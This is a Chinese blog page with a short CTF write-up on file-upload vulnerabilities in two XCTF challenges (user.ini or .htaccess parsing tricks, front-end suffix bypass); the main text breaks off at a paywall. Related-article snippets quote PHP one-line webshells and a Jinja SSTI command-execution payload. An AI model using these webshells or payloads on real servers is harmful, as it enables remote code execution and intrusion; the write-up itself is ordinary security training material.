攻防世界 文件上传总结

最新推荐文章于 2024-08-24 15:29:34 发布
最新推荐文章于 2024-08-24 15:29:34 发布
阅读量626 收藏 1
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56559508/article/details/127934349
版权
这篇博客总结了攻防世界中关于文件上传漏洞的案例,包括easyupload和upload1两个题目。作者指出,文件上传漏洞通常由于未对上传文件进行严格审查,允许上传恶意文件如php或包含危险函数的文件。在easyupload中,利用user.ini文件来实现类似.htaccess的功能,通过配置文件解析实现文件执行。而在upload1中,可以通过前端代码篡改或使用Burp Suite修改文件头绕过后缀名检查。文章强调了前端和后端检查的重要性,并表示将补充更多相关知识。
摘要由CSDN通过智能技术生成

0x00

文件上传漏洞,(主要指上传至后端的)对上传的文件以及文件内容并未做出审查过滤,导致给后端服务器上传木马或者含有危险函数的文件。

0x01

题目:easyupload

官方wirteup写的很明白,绕过的点:

  • 检查文件内容是否有php字符串
  • 检查后缀中是否有htaccess或ph
  • 检查文件头部信息
  • 文件MIME类型

下面是抓的数据包

然后这题思路是通过上传user.ini,然后上传user.ini中对应的格式文件配上payload。最后在访问上传的payload的文件。

user.ini的作用和.htacess文件作用是类似的,都是通过上传配置文件,利用配置文件解析当前目录指定文件,比如我上传了user.ini/..htacess 这里面内容我定为将png.文件解析为.php文件,我在访问.png文件就会解析为php内容反馈到浏览器上

这题有个拓展可以去了解,凡是用fastcgi的服务器,apache/ngnix 都可以用此思路

最后上传文件后,你可以用蚁剑或者相关工具,翻目录查看,也可以命令执行直接cat flag。

题目:upload1

</

最低0.47元/天 解锁文章
「已注销」
关注
[xctf]ics-07攻防世界(代码审计 + 正则 + 文件上传
qq_37301470的博客
11-20 495
Ics -07 攻防世界 代码审计 + 正则 + 文件上传 + 登录session 源代码已经给出 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_start(); if (!iss
攻防世界easy_web之SSTI注入
m0_66935689的博客
07-29 294
昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
攻防世界-web-wzsc_文件上传
mlws1900的博客
08-24 4023
1、网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除该文件。2、网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。在删除之前访问上传的php文件,从而执行上传文件中的php代码。服务器获取文件>>>保存上传临时文件>>>重命名移动临时文件。可以看到shell已经被上传,用蚁剑连接。上传一个空内容的jpg文件,上传成功。打开环境,很简单的上传界面。1. 文件上传过程介绍。例如:上传文件代码如下。此为需要上传的文件内容。利用条件竞争文件上传
攻防世界-web题型-5星难度汇总-个人wp
最新发布
DamnVanish的博客
08-24 1082
攻防世界的5星难度靶场wp
【愚公系列】2023年06月 攻防世界-Web(wzsc_文件上传
时光隧道
06-17 5398
文件上传漏洞(File Upload Vulnerability)是指攻击者通过某种方式绕过应用程序上传文件的安全检测机制,将恶意文件或脚本上传至目标服务器,达到执行任意恶意代码的目的。攻击者可以通过此漏洞窃取、篡改、删除或破坏网站数据,或对受害者发起其他形式的攻击。文件上传漏洞可能出现在各种类型的Web应用程序中,包括电子商务、CMS、论坛、博客、社交网络和在线媒体等。攻击者通常会利用Web应用程序提供的文件上传功能,来上传恶意文件。
【条件竞争】攻防世界web进阶区 泰山杯 wzsc_文件上传
qq_45608153的博客
08-12 3164
攻防世界web进阶区 泰山杯 wzsc_文件上传
攻防世界-web-upload1
wuh2333的博客
05-21 325
攻防世界,upload1
攻防世界 WEB
BvxiE的博客
02-11 1228
攻防世界 新手区 WEBview sourcerobots​​​​backup功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 view source 查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了,那就F12吧!​ 或
攻防世界web练习区题目解答
weixin_46262057的博客
03-22 4881
xctf的web练习区题目解答。
网络攻防世界
tricker2的博客
08-01 248
本次来个十连总结 supersqli 利用的是sql注入 利用alter修改表结构。?inject=-1’;show tables;–+ 1.首先查看字段, -1’;show columns from 1919810931114514 --+ -1’;show columns from words --+ 由上面的探测我们可以猜测出这里会查询出words表的data列的结果。也就是类似于下面的sql语句: select * from words where id = ‘’; 2.我们将表19198109
攻防世界-web-upload
wuh2333的博客
12-13 1227
攻防世界,web,upload,sql注入
file upload 攻防世界_攻防世界-upload1
weixin_39710991的博客
12-30 151
先打开实验环境实验准备:Firefox浏览器+Burp+蚁剑Burp:用于代理浏览器处理的http信息蚁剑:用于一句话木马的文件连接1.1这里选择后缀名为php的文件,发现浏览器很快就做出反应了,ctrl+u看下网页源代码,(可能是js前端的过滤,因为反应太快了);果然是前端js过滤了,只允许后缀为jpg和png的文件上传;1.2解决办法:先准备好含有一句话木马的php文件,密码为zxc(zxc可...
file upload 攻防世界_攻防世界进阶--upload1
weixin_34945060的博客
02-15 155
今天突然有个小朋友问我这道web题,就打算记录一下(就是来水一篇博客的)考点:文件上传做题:文件上传,基本上就是传送一句话 -> 菜刀(等)连接(题外话:还有服务器等基础文件等等,这一块已经开始扩展了例如:use.ini/.htacess)回归本题:Array.prototype.contains = function (obj) {var i = this.length;while (i-...
攻防世界web进阶upload1
0pt1mus
03-13 891
转自个人博客0pt1mus 打开网站,可以发现只存在一个选择文件框和一个上传按钮。 我们可以考虑直接上传一个一句话木马尝试。 <?php @eval($_POST['shell']);?> 快速弹出警告框,让上传图片文件。猜测是前端js判断。 F12打开控制台,成功发现js代码,右击直接删掉。 重新选择一句话木马,此时发现上传按钮无法点击,在F12的console中将按钮的di...
wzsc_文件上传
m0_70819573的博客
02-18 1099
其原理是在上传时平台不会立刻删除文件,会保留极短的一段时间,利用其间隙访问,就可以创造出php文件。题目本身逻辑很简单,不过黑盒测试真的费脑子,有十多种解法,不过上传图片时回显有提醒。同时用薄荷将两个数据包调整为无负载,并一直持续攻击,注意抓包的线程要比上传包多。文件上传题型有许多解法,这道题使用条件竞争去解决。也可以用python脚本去做,附上大佬的脚本。3.最后用蚁剑连接,获取flag。
攻防世界web进阶区upload详解
hxhxhxhxx的博客
08-13 2025
攻防世界web进阶区upload详解题目②CONV(N,from_base,to_base)③substr(string,start,length) 题目 进入页面是我们的注册 登录以后,发现可以文件上传 传完之后发现有回显,猜测可能是文件名注入 我们先进行一系列得上传测试,发现都不行 这时候,御剑发来了好消息, 这儿有一个include,classes的文件 我们使用burp康康有哪些过滤 发现被制为了空,我们猜一猜是双写绕过 下面解除文件名字注入 1.把文件名改成 a' +(selsele
攻防世界:upload1
bjml_的博客
11-06 869
攻防世界:upload1
攻防世界之upload1 -----文件上传漏洞
weixin_44632787的博客
07-24 364
攻防世界之upload1 题目 文件上传漏洞,所以上传一句话木马… GIF89a? <script language="php">eval($_POST['zyh']);</script> 一开始是直接上传php文件,但是发现它会被拦下 没关系,那就先改成文件后缀名,然后用BurpSuite抓包! 然后再用BurpSuite改一下后缀名就可以了(改成php文件) 最后再用蚁剑链接就可以得到Flag了 ...
攻防世界XCTF:upload
末初的CSDN博客
03-08 877
这里有个注册登入,迷惑行为,漏洞不在这里 这题比较意外,不是上传题是sql注入而且还是文件名的SQL注入, 因为回显的只是文件名,然后它存入数据库的也可能是文件名,既然连接了数据库就可能存在注入漏洞。然后就能想到可能是文件名sql注入。 任何与数据库发生连接交互的地方都可能存在SQL注入! 然后就开始构造文件名的payload,首先介绍几个函数。 conv(N,from_base,to_ba...
攻防世界文件包含读文件
10-01
关于攻防世界文件包含读文件的问题,你提到了一个例子file1=php://filter/read=convert.base64-encode/resource=flag.php。这是一种利用php内置的filter机制,将文件内容以base64编码的形式读取出来。在这个例子中,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值